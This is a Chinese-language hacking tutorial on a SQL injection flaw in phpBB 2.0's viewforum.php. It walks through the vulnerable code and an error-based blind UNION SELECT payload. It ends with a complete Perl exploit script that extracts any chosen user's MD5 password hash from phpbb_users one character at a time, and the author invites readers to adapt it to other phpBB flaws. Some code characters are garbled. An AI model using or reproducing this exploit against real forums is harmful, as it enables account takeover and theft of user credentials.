php注入實(shí)例在網(wǎng)上很難看到一篇完整的關(guān)于php注入的文章和利用代碼,于是我自已把mysql和php硬啃了幾個(gè)星期，下面說(shuō)說(shuō)我的休會(huì)吧,希望能拋磚引玉!
相信大家對(duì)asp的注入已經(jīng)是十分熟悉了,而對(duì)php的注入比asp要困難,因?yàn)閜hp的magic_gpc選項(xiàng)確實(shí)讓人頭疼,在注入中不要出現(xiàn)引號(hào),而php大多和mysql結(jié)合,而mysql的功能上的缺點(diǎn),從另外一人角度看確在一定程度上防止了sql njection的攻擊,我在這里就舉一個(gè)實(shí)例吧,我以phpbb2.0為例:
在viewforum.php中有一個(gè)變量沒(méi)過(guò)濾:
if ( isset($HTTP_GET_VARS<pOST_FORUM_URL]) ││ isset($HTTP_POST_VARS<pOST_FORUM_URL]) )
{
$forum_id = ( isset($HTTP_GET_VARS<pOST_FORUM_URL]) ) ? intval($HTTP_GET_VARS<pOST_FORUM_URL]): intval

($HTTP_POST_VARS<pOST_FORUM_URL]);
}
else if ( isset($HTTP_GET_VARS['forum']))
{
$forum_id = $HTTP_GET_VARS['forum'];
}
else
{
$forum_id = '';
}
就是這個(gè)forum,而下面直接把它放進(jìn)了查詢(xún)中:
if ( !empty($forum_id) )
{
$sql = "SELECT *
FROM " . FORUMS_TABLE . "
WHERE forum_id = $forum_id";
if ( !($result = $db->sql_query($sql)) )
{
message_die(GENERAL_ERROR, 'Could not obtain forums information', '', __LINE__, __FILE__, $sql);
}
}
else
{
message_die(GENERAL_MESSAGE, 'Forum_not_exist');
}

如果是asp的話(huà)，相信很多人都會(huì)注入了.如果這個(gè)forum_id指定的論壇不存在的話(huà)，就會(huì)使$result為空，于是返回Could not obtain forums information的信息,于是下面的代碼就不能執(zhí)行下去了
//
// If the query doesn't return any rows this isn't a valid forum. Inform
// the user.
//
if ( !($forum_row = $db->sql_fetchrow($result)) )
{
message_die(GENERAL_MESSAGE, 'Forum_not_exist');
}

//
// Start session management
//
$userdata = session_pagestart($user_ip, $forum_id) /****************************************

關(guān)鍵就是打星號(hào)的那一行了,這里是一個(gè)函數(shù)session_pagestart($user_ip, $thispage_id),這是在session.php中定義的一個(gè)函數(shù),由于代碼太

長(zhǎng)，就不全貼出來(lái)了,有興趣的可以自已看看，關(guān)鍵是這個(gè)函數(shù)還調(diào)用了session_begin(),函數(shù)調(diào)用如下session_begin($user_id, $user_ip,

$thispage_id, TRUE))，同樣是在這個(gè)文件中定義的,其中有如下代碼
$sql = "UPDATE " . SESSIONS_TABLE . "
SET session_user_id = $user_id, session_start = $current_time, session_time = $current_time, session_page =

$page_id, session_logged_in = $login
WHERE session_id = '" . $session_id . "'
AND session_ip = '$user_ip'";
if ( !($result = $db->sql_query($sql)) ││ !$db->sql_affectedrows() )
{
$session_id = md5(uniqid($user_ip));

$sql = "INSERT INTO " . SESSIONS_TABLE . "
(session_id, session_user_id, session_start, session_time, session_ip, session_page,

session_logged_in)
VALUES ('$session_id', $user_id, $current_time, $current_time, '$user_ip', $page_id, $login)";
if ( !($result = $db->sql_query($sql)) )
{
message_die(CRITICAL_ERROR, 'Error creating new session : session_begin', '', __LINE__, __FILE__,

$sql);
}


在這里有個(gè)session_page在mysql中定義的是個(gè)整形數(shù),他的値$page_id,也就是$forum_id,如果插入的不是整形就會(huì)報(bào)錯(cuò)了,就會(huì)出現(xiàn)Error

creating new session : session_begin的提示,所以要指這$forum_id的值很重要,所以我把它指定為:-1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%20user_id=2%20and%20ord(substring(user_password,1,1))=57,沒(méi)有引號(hào)吧!雖然指定的是一個(gè)不存在的forum_id但他返回的查詢(xún)結(jié)果可不一定是為空,這個(gè)就是猜user_id為2的用戶(hù)的第一位密碼的ascii碼值是是否為57,如果是的話(huà)文章中第一段代碼中的$result可不為空了,于是就執(zhí)行了ession_pagestart這個(gè)有問(wèn)題的函數(shù)，插入的不是整數(shù)當(dāng)然就要出錯(cuò)了，于是就顯示Error creating new session : session_begin,就表明你猜對(duì)了第一位了，其它位類(lèi)似.

如果沒(méi)有這句出錯(cuò)信息的話(huà)我想即使注入成功也很難判斷是否已經(jīng)成功，看來(lái)出錯(cuò)信息也很有幫助啊.分析就到這里，下面附上一段測(cè)試代碼，這段代碼只要稍加修改就能適用于其它類(lèi)似的猜md5密碼的情況,這里我用的英文版的返回條件，中文和其它語(yǔ)言的只要改一下返回條件就行了.

use HTTP::Request::Common;
use HTTP::Response;
use LWP::UserAgent;
$ua = new LWP::UserAgent;

print " ***********************n";
print " phpbb viewforum.php expn";
print " code by pinkeyesn";
print " www.icehack.comn";
print " ************************n";
print "please enter the weak file's url:n";
print "e.g. http://192.168.1.4/phpBB2/viewforum.phpn";
$adr=<STDIN>;
chomp($adr);
print "please enter the user_id that you want to crackn";
$u=<STDIN>;
chomp($u);
print "work starting,please wait!n";
@pink=(48..57);
@pink=(@pink,97..102);
for($j=1;$j<=32;$j++){
for ($i=0;$i<@pink;$i++){
$url=$adr."?forum=-1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%

20user_id=$u%20and%20ord(substring(user_password,$j,1))=$pink[$i]";
$request = HTTP::Request->new('GET', "$url");
$response = $ua->request($request);

if ($response->is_success) {
if ($response->content =~ /Error creating new session/) {
$pwd.=chr($pink[$i]);
print "$pwdn";
}

}
}
}
if ($pwd ne ""){
print "successfully,The password is $pwd,good luckn";}
else{
print "bad luck,work failed!n";}

至于最近的phpbb2.0.6的search.php的問(wèn)題利用程序只要將上面代碼稍加修改就行了,如要錯(cuò)誤請(qǐng)上www.icehack.com指正.